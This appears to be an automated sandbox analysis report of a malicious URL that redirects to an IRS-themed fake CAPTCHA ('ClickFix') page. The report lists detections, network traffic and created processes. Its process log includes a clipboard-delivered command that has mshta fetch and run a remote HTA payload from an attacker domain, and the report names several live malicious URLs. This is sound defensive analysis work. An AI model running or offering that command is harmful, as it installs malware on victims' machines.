Windows Analysis Report
https://lfkworld.nl/

General Information

Sample URL: https://lfkworld.nl/
Analysis ID: 1696909
Infos: yara

Detection

CAPTCHA Scam ClickFix
Score: 80
Range: 0 - 100
Confidence: 100%

Signatures

AI detected phishing page
Antivirus detection for URL or domain
Detect drive by download via clipboard copy & paste
Yara detected CAPTCHA Scam ClickFix
HTML page adds supicious text to clipboard
Performs DNS queries to domains with low reputation
Creates a process in suspended mode (likely to inject code)
Detected suspicious crossdomain redirect
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Suricata IDS alerts with low severity for network traffic

Classification

AV Detection
barindex
Antivirus detection for URL or domain
Source: https://usadockfile.live/favicon.ico Avira URL Cloud: Label: malware
Source: https://usadockfile.live/checking-service.com-delivery.org/example_step3.gif Avira URL Cloud: Label: malware
Source: https://usadockfile.live/checking-service.com-delivery.org/example_step1.gif Avira URL Cloud: Label: malware
Source: https://usadockfile.live/checking-service.com-delivery.org/fx.ico Avira URL Cloud: Label: malware
Source: https://usadockfile.live/ Avira URL Cloud: Label: malware
Source: https://usadockfile.live/backblue.gif Avira URL Cloud: Label: malware
Source: https://usadockfile.live/fade.gif Avira URL Cloud: Label: malware
Source: https://usadockfile.live/checking-service.com-delivery.org/example_step2.gif Avira URL Cloud: Label: malware
Source: https://usadockfile.live/checking-service.com-delivery.org/background2.png Avira URL Cloud: Label: malware

Phishing
barindex
AI detected phishing page
Source: https://usadockfile.live/checking-service.com-delivery.org/index.html Joe Sandbox AI: Score: 7 Reasons: The brand 'IRS' is well-known and is associated with the legitimate domain 'irs.gov'., The URL 'usadockfile.live' does not match the legitimate domain 'irs.gov'., The domain 'usadockfile.live' is suspicious as it does not contain any recognizable association with the IRS., The use of a '.live' domain extension is unusual for a government-related site, which typically uses '.gov'., The URL does not contain any direct reference to the IRS, increasing the likelihood of phishing. DOM: 2.1.pages.csv
Yara detected CAPTCHA Scam ClickFix
Source: Yara match File source: 2.1.pages.csv, type: HTML
Source: Yara match File source: 2.4.pages.csv, type: HTML
Source: Yara match File source: 2.2.pages.csv, type: HTML
Source: Yara match File source: 2.3.pages.csv, type: HTML
Source: Yara match File source: dropped/chromecache_65, type: DROPPED
Source: https://lfkworld.nl/ HTTP Parser: No favicon
Source: unknown HTTPS traffic detected: 131.253.33.254:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.4:49744 version: TLS 1.2

Networking
barindex
Performs DNS queries to domains with low reputation
Source: DNS query: kdori.xyz
Source: DNS query: kdori.xyz
Source: DNS query: kdori.xyz
Detected suspicious crossdomain redirect
Source: C:\Program Files\Google\Chrome\Application\chrome.exe HTTP traffic: Redirect from: usdoki.today to https://usadockfile.live
Suricata IDS alerts with low severity for network traffic
Source: Network traffic Suricata IDS: 2018302 - Severity 1 - ET PHISHING Possible Phish - Mirrored Website Comment Observed : 91.92.46.231:443 -> 192.168.2.4:49736
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown TCP traffic detected without corresponding DNS query: 52.113.196.254
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown TCP traffic detected without corresponding DNS query: 74.125.137.94
Source: unknown TCP traffic detected without corresponding DNS query: 74.125.137.94
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknown TCP traffic detected without corresponding DNS query: 172.202.163.200
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: lfkworld.nlConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: lfkworld.nlConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://lfkworld.nl/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=KrHcbHhNmtApn1x&MD=oZ1WE4YL HTTP/1.1host: slscr.update.microsoft.comaccept: */*user-agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33accept-encoding: identity
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: usdoki.todayConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://lfkworld.nl/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: usadockfile.liveConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://lfkworld.nl/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /backblue.gif HTTP/1.1Host: usadockfile.liveConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://usadockfile.live/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /fade.gif HTTP/1.1Host: usadockfile.liveConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://usadockfile.live/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /checking-service.com-delivery.org/index.html HTTP/1.1Host: usadockfile.liveConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://usadockfile.live/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: usadockfile.liveConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://usadockfile.live/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /backblue.gif HTTP/1.1Host: usadockfile.liveConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /fade.gif HTTP/1.1Host: usadockfile.liveConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /www.gstatic.com/recaptcha/api2/logo_48.png HTTP/1.1Host: usadockfile.liveConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://usadockfile.live/checking-service.com-delivery.org/index.htmlAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /checking-service.com-delivery.org/example_step1.gif HTTP/1.1Host: usadockfile.liveConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://usadockfile.live/checking-service.com-delivery.org/index.htmlAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /checking-service.com-delivery.org/example_step2.gif HTTP/1.1Host: usadockfile.liveConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://usadockfile.live/checking-service.com-delivery.org/index.htmlAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /www.gstatic.com/recaptcha/api2/logo_48.png HTTP/1.1Host: usadockfile.liveConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /checking-service.com-delivery.org/example_step3.gif HTTP/1.1Host: usadockfile.liveConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://usadockfile.live/checking-service.com-delivery.org/index.htmlAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /checking-service.com-delivery.org/background2.png HTTP/1.1Host: usadockfile.liveConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://usadockfile.live/checking-service.com-delivery.org/index.htmlAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /checking-service.com-delivery.org/example_step2.gif HTTP/1.1Host: usadockfile.liveConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /checking-service.com-delivery.org/example_step1.gif HTTP/1.1Host: usadockfile.liveConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /checking-service.com-delivery.org/example_step3.gif HTTP/1.1Host: usadockfile.liveConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /checking-service.com-delivery.org/fx.ico HTTP/1.1Host: usadockfile.liveConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://usadockfile.live/checking-service.com-delivery.org/index.htmlAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /checking-service.com-delivery.org/background2.png HTTP/1.1Host: usadockfile.liveConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /checking-service.com-delivery.org/fx.ico HTTP/1.1Host: usadockfile.liveConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=KrHcbHhNmtApn1x&MD=oZ1WE4YL HTTP/1.1host: slscr.update.microsoft.comaccept: */*user-agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33accept-encoding: identity
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: lfkworld.nl
Source: global traffic DNS traffic detected: DNS query: usdoki.today
Source: global traffic DNS traffic detected: DNS query: usadockfile.live
Source: global traffic DNS traffic detected: DNS query: kdori.xyz
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 22 May 2025 13:56:48 GMTServer: ApacheContent-Length: 196Keep-Alive: timeout=5, max=99Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 22 May 2025 13:56:57 GMTServer: Apache/2.4.52 (Ubuntu)Content-Length: 279Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1
Source: mshta.exe, 00000014.00000002.2085234807.0000000002C9E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://kdori.xyz/am2v93vnqoavsdjl.hta
Source: mshta.exe, 00000014.00000002.2085234807.0000000002CDB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000014.00000002.2085234807.0000000002D0C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://kdori.xyz/am2v93vnqoavsdjl.hta...
Source: mshta.exe, 00000014.00000002.2085234807.0000000002C9E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://kdori.xyz/am2v93vnqoavsdjl.hta3
Source: mshta.exe, 00000014.00000002.2086289512.0000000002D90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000014.00000002.2085234807.0000000002C80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://kdori.xyz/am2v93vnqoavsdjl.htaWinSta0
Source: mshta.exe, 00000014.00000002.2085191352.00000000029EA000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: http://kdori.xyz/am2v93vnqoavsdjl.htad
Source: mshta.exe, 00000014.00000002.2085234807.0000000002C9E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://kdori.xyz/am2v93vnqoavsdjl.htaj2
Source: mshta.exe, 00000014.00000002.2086289512.0000000002D90000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000014.00000002.2085234807.0000000002C80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://kdori.xyz/am2v93vnqoavsdjl.htamshta
Source: mshta.exe, 00000014.00000002.2085234807.0000000002CDB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: chromecache_72.3.dr String found in binary or memory: https://usdoki.today
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49671 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown HTTPS traffic detected: 131.253.33.254:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.4:49744 version: TLS 1.2
Searches for the Microsoft Outlook file path
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Source: classification engine Classification label: mal80.phis.troj.win@27/34@13/4
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7892:120:WilError_03
Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2264,i,15146219156717733873,6408738554136214457,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2300 /prefetch:3
Source: unknown Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://lfkworld.nl/"
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /K mshta http://kdori.xyz/am2v93vnqoavsdjl.hta
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\mshta.exe mshta http://kdori.xyz/am2v93vnqoavsdjl.hta
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2264,i,15146219156717733873,6408738554136214457,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2300 /prefetch:3 Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown Jump to behavior
